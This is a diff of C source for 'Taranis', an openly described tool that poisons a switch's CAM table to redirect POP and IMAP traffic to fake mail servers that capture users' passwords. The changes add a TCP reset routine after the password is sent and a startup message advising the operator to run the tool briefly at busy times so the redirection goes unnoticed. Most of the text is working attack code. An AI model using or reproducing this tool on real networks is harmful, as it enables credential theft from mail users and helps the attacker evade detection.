@@ -1,13 +1,13 @@
 /*
  * Taranis redirects traffic on a switch and provides fake imap and pop 
  * servers in order to steal passwords.  This is written to demonstrate
- * the necessity of strong authentication.
+ * the absolute necessity of strong authentication.
  *
- * inputs - ip of gateway or ip of pop server if it's on the switch
+ * inputs - ip of pop/imap server
  *
- * two threads
- *     first  - sends spoofed traffic
- *     second - fake pop server
+ * taranis runs two threads
+ *     first  thread - sends spoofed traffic
+ *     second thread - fake pop/imap server
  *
  */
 
@@ -20,18 +20,18 @@
  * continually send packets with:
  *
  * ether dst == local mac address
- * ether src == gateway's or pop server's
- * other packet characteristics don't matter as they _shouldn't_ ever
+ * ether src == pop/imap server's mac address
+ * other packet characteristics don't matter as this packet_shouldn't_ ever
  * be forwarded by the switch.  Currently an ICMP echo reply packet
  * is sent.
  *
- * this will corrupt the switch's internal routing table and will result 
- * in traffic being redirected to us.
+ * this will corrupt the switch's CAM table and will result in traffic 
+ * destined for the pop/imap server being redirected to us.
  */
 
 /* Second thread
  *
- * raw ethernet pop server.. damn.. this is going to suck..
+ * raw ethernet pop/imap server..
  * needs to fake a partial session as if it were the actual destination
  * - read syn
  * - send syn/ack
@@ -43,6 +43,7 @@
  * the pop protocol is insanely simple
  * when the client connects the conversation looks like this:
  * (S == Server C==Client)
+ *
  * S:"+OK POP3 server ready CRLF"
  * C:"USER foo CRLF"
  * S:"+OK CRLF"
@@ -55,7 +56,7 @@
  * 
  * S: + OK EvilServer here
  * C: LOGIN USERNAME PASSWORD
- * we've won at this point
+ * and again, we've won at this point
  */
 
 #include <stdio.h>
@@ -108,9 +109,10 @@ u_int32_t              Dst_ip;
 u_int32_t              Gw_ip;
 u_int32_t              Ms_ip;
 pthread_t              Spoof_thread;
-char                   pop_banner[] = "+OK POP3 Server\r\n";
-char                   pop_ok[] = "+OK\r\n";
-char                   imap_banner[] = "* OK IMAP4rev1 Server\r\n";
+char                   Pop_banner[] = "+OK POP3 Server\r\n";
+char                   Pop_ok[] = "+OK\r\n";
+char                   Imap_banner[] = "* OK IMAP4rev1 Server\r\n";
+int                    Debug_level = 1;
 
 int
 main(int argc, char *argv[])
@@ -130,8 +132,12 @@ main(int argc, char *argv[])
 
   printf("[*] Taranis starting ... \n");
   printf("[*] Written by jwilkins@bitland.net, based on an idea by");
-  printf(" jesse@bitland.org\n");
+  printf(" jesse@bitland.net\n");
   printf("[*] Thanks to skyper@segfault.net for all his help\n");
+  printf("[*] Running for extended periods is not advised as no real \n");
+  printf("    connections to the target server will be possible.  This will\n");
+  printf("    be noticed.  Running for short periods, at high traffic times\n");
+  printf("    such as after lunch, is recommended\n");
   printf("[*] Using libpcap version %s\n", pcap_version);
 
   /* seed libnet random number generator */
@@ -353,7 +359,7 @@ process_ip(u_char *packet, int len)
   }
 
   tcpdata   =(packet + (Pcap_media_offset+(iph->ip_hl*4)+(tcph->th_off*4)));
-  tcpdatalen=(iph->ip_len-(Pcap_media_offset+(iph->ip_hl*4)+(tcph->th_off*4)));
+  tcpdatalen=(ntohs(iph->ip_len)-(iph->ip_hl*4)+(tcph->th_off*4));
 
   /* I'm going to be _really_ cheesy here.. forgive me
    * we can have canned replies for any packet that we expect, we just
@@ -365,7 +371,6 @@ process_ip(u_char *packet, int len)
    * POP USER always causes an OK packet and we save it
    * POP PASS packet we save
    * IMAP a001 LOGIN packet we save
-   * we will see some packets repeated because we don't ACK them
    */
 
   /* Check it's a packet destined for the POP or IMAP port */
@@ -374,7 +379,6 @@ process_ip(u_char *packet, int len)
     return;
   }
 
-
   /* is it a syn */
   if(tcph->th_flags == TH_SYN){
     /* Check it's destined for the server specified on the command line */
@@ -401,7 +405,7 @@ process_ip(u_char *packet, int len)
       printf(" `-> sending POP banner\n");
       send_pop_banner(packet, len);
     } else {
-      printf(" `-> sending imap banner\n");
+      printf(" `-> sending IMAP banner\n");
       send_imap_banner(packet, len);
     }
     return;
@@ -415,16 +419,21 @@ process_ip(u_char *packet, int len)
      (tcph->th_flags == 0)){
    
     if(tcph->th_flags == TH_ACK){
-      printf("[process_ip] - ACK      (id %04x)\n", iph->ip_id);
+      if(Debug_level > 2)
+        printf("[process_ip] - ACK      (id %04x)\n", iph->ip_id);
     }
     if(tcph->th_flags == (TH_PUSH | TH_ACK)){
-      printf("[process_ip] - PUSH/ACK (id %04x)\n", iph->ip_id);
+      if(Debug_level > 2)
+        printf("[process_ip] - PUSH/ACK (id %04x)\n", iph->ip_id);
     }
     if(tcph->th_flags == 0){
-      printf("[process_ip] - 0        (id %04x)\n", iph->ip_id);
+      if(Debug_level > 2)
+        printf("[process_ip] - 0        (id %04x)\n", iph->ip_id);
     }
     if(tcpdatalen > 0){
-      printf("[process_ip] - tcpdatalen = %d\n", tcpdatalen);
+      if(Debug_level > 2)
+        printf("[process_ip] - tcpdatalen = %d\n", tcpdatalen);
+
       save_packet_content((u_int32_t *)iph->ip_src.s_addr, 
                           (u_int32_t *)iph->ip_dst.s_addr,
                           tcph->th_sport, tcph->th_dport, 
@@ -433,7 +442,11 @@ process_ip(u_char *packet, int len)
       if(ntohs(tcph->th_dport) == POP_PORT){
         if(!strncasecmp(tcpdata, "USER", 4)){ 
           send_pop_ok(packet, len);
+        } else if(!strncasecmp(tcpdata, "PASS", 4)){ 
+          send_rst(packet, len);
         }
+      } else if(ntohs(tcph->th_dport) == IMAP_PORT){
+        send_rst(packet, len);
       }
     }
   }
@@ -504,14 +517,59 @@ send_synack(u_char *packet, int len)
   /* and turn on ACK flag */
   tcph->th_flags |= TH_ACK;
 
-//  /* make tcp options all NOPs */
-//  tcp_options_start = (Pcap_media_offset + (iph->ip_hl * 4) + 20);
-//  tcp_options_len   = ((tcph->th_off * 4) - 20);
-//  for(x=0;x<tcp_options_len;x++){
-//    reply_packet[tcp_options_start + x] = 0x01;
-//  }
-//  /* mark end of options */
-//  reply_packet[tcp_options_start + tcp_options_len - 1] = 0x00;
+  iph->ip_sum = 0;
+  tcph->th_sum = 0;
+
+  /* compute checksums */
+  if(libnet_do_checksum(reply_packet + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1){
+    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
+  }
+  /* tcp checksum is computed over header + data */
+  tcph->th_sum = jpw_tcp_cksum(reply_packet, len, Pcap_media_offset);
+
+  /* send it */
+  send_packet(reply_packet, len);
+
+  /* free it */
+  free(reply_packet);
+  reply_packet = NULL;
+}
+
+void
+send_rst(u_char *packet, int len)
+{
+  u_char              *reply_packet;
+  struct ip           *iph;
+  struct tcphdr       *tcph;
+  u_int32_t            tmp_int;
+  u_int16_t            random1;
+  u_int16_t            tcph_off;
+  int                  x;
+  int                  tcp_options_start, tcp_options_len;
+
+  reply_packet = (u_char *)calloc(1, len);
+  memcpy(reply_packet, packet, len);
+
+  iph  = (struct ip *)    (reply_packet+Pcap_media_offset);
+  tcph = (struct tcphdr *)(reply_packet+Pcap_media_offset+(iph->ip_hl * 4));
+  tcph_off = (Pcap_media_offset+(iph->ip_hl * 4));
+
+  /* point it in the right direction */
+  reverse_packet(reply_packet, len);
+
+  /* increment syn # */
+  tmp_int = ntohl(tcph->th_seq);
+  tmp_int++;
+  tcph->th_seq = tcph->th_ack;
+  tcph->th_ack = 0;
+
+
+  /* and an IP ID */
+  random1 = libnet_get_prand(LIBNET_PRu16);
+  iph->ip_id = htons(random1);
+
+  /* and turn on ACK flag */
+  tcph->th_flags = TH_RST;
 
   iph->ip_sum = 0;
   tcph->th_sum = 0;
@@ -606,10 +664,10 @@ send_pop_banner(u_char *packet, int len)
 
   header_len = (Pcap_media_offset + (iph->ip_hl*4) + (tcph->th_off*4));
 
-  new_packet_len = (header_len + sizeof(pop_banner) - 1);
+  new_packet_len = (header_len + sizeof(Pop_banner) - 1);
   new_packet = (u_char *)calloc(1, new_packet_len);
   memcpy(new_packet, packet, header_len);
-  memcpy(&new_packet[header_len], pop_banner, sizeof(pop_banner)-1);
+  memcpy(&new_packet[header_len], Pop_banner, sizeof(Pop_banner)-1);
 
   iph  = (struct ip *)(new_packet+Pcap_media_offset);
   tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));
@@ -619,7 +677,7 @@ send_pop_banner(u_char *packet, int len)
 
   /* reset packet size */
   tmp_short = ntohs(iph->ip_len);
-  tmp_short += strlen(pop_banner);
+  tmp_short += strlen(Pop_banner);
   iph->ip_len = htons(tmp_short);
 
   /* increment seq # */
@@ -685,10 +743,10 @@ send_pop_ok(u_char *packet, int len)
 
   data_len = (len - header_len);
 
-  new_packet_len = (header_len + sizeof(pop_ok) - 1);
+  new_packet_len = (header_len + sizeof(Pop_ok) - 1);
   new_packet = (u_char *)calloc(1, new_packet_len);
   memcpy(new_packet, packet, header_len);
-  memcpy(&new_packet[header_len], pop_ok, sizeof(pop_ok)-1);
+  memcpy(&new_packet[header_len], Pop_ok, sizeof(Pop_ok)-1);
   printf("[send_pop_ok] new_packet_len is %d\n", new_packet_len);
 
   iph  = (struct ip *)(new_packet+Pcap_media_offset);
@@ -699,7 +757,7 @@ send_pop_ok(u_char *packet, int len)
 
   /* reset packet size */
   tmp_short = (header_len - 14);
-  tmp_short += strlen(pop_ok);
+  tmp_short += strlen(Pop_ok);
   iph->ip_len = htons(tmp_short);
 
   /* increment seq # */
@@ -708,7 +766,7 @@ send_pop_ok(u_char *packet, int len)
   tcph->th_ack = htonl(tmp_int);
 
   /* increment our sequence number */
-  tcph->th_seq = ntohl(OSYN + 1 + sizeof(pop_banner) - 1);
+  tcph->th_seq = ntohl(OSYN + 1 + sizeof(Pop_banner) - 1);
 
   /* make up an IP ID */
   random1 = libnet_get_prand(LIBNET_PRu16);
@@ -755,10 +813,10 @@ send_imap_banner(u_char *packet, int len)
   u_int16_t            tmp_short;
   int                  x, tcp_options_start, tcp_options_len;
 
-  new_packet_len = len + sizeof(imap_banner)-1;
+  new_packet_len = len + sizeof(Imap_banner)-1;
   new_packet = (u_char *)calloc(1, new_packet_len);
   memcpy(new_packet, packet, len);
-  memcpy(&new_packet[len], imap_banner, sizeof(imap_banner)-1);
+  memcpy(&new_packet[len], Imap_banner, sizeof(Imap_banner)-1);
 
   iph  = (struct ip *)(new_packet+Pcap_media_offset);
   tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));
@@ -768,7 +826,7 @@ send_imap_banner(u_char *packet, int len)
 
   /* reset packet size */
   tmp_short = ntohs(iph->ip_len);
-  tmp_short += strlen(imap_banner);
+  tmp_short += strlen(Imap_banner);
   iph->ip_len = htons(tmp_short);
 
   /* increment seq # */
@@ -820,10 +878,10 @@ print_usage(char *name)
   printf("  -r\t\tRead from a pcap file (testing only)\n");
   printf("  -s\t\tspecify source ip address for spoofed packets\n");
   printf("  -d\t\tspecify destination ip address for spoofed packets\n");
-  printf("  -g\t\tgateway ip address\n");
-  printf("  -m\t\tip address of mail server\n");
+  /* printf("  -g\t\tgateway ip address\n"); */
+  printf("  -m\t\tip address of mail server (required)\n");
   printf("  -l\t\tfile name for log\n");
-  printf("  -e\t\tdestination ethernet address\n");
+  printf("  -e\t\tethernet address of mail server (required)\n");
   printf("Example:\n");
   printf("./%s -m 10.0.0.90 -e 00:a0:cc:3b:af:bd\n", name);
 }
@@ -1199,4 +1257,4 @@ send_icmp_reply(u_int32_t sip, u_int32_t dip, struct ether_addr *e_src)
 
 }
 
-  
+
